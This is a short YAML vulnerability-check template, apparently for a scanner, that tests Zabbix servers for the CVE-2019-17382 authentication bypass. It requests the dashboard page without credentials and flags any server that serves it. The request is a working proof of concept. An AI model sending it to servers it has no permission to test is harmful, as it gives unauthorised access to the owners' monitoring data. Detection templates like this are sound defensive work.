id: CVE-2019-17382 info: name: Zabbix Improper Authentication risk: Critical params: - root: '{{.BaseURL}}' variables: - endpoint: | zabbix.php requests: - method: GET url: >- {{.root}}/{{.endpoint}}?action=dashboard.view&dashboardid=1 headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StatusCode() == 200 && StringSearch("resBody", "Dashboard") references: - https://www.cvebase.com/cve/2019/17382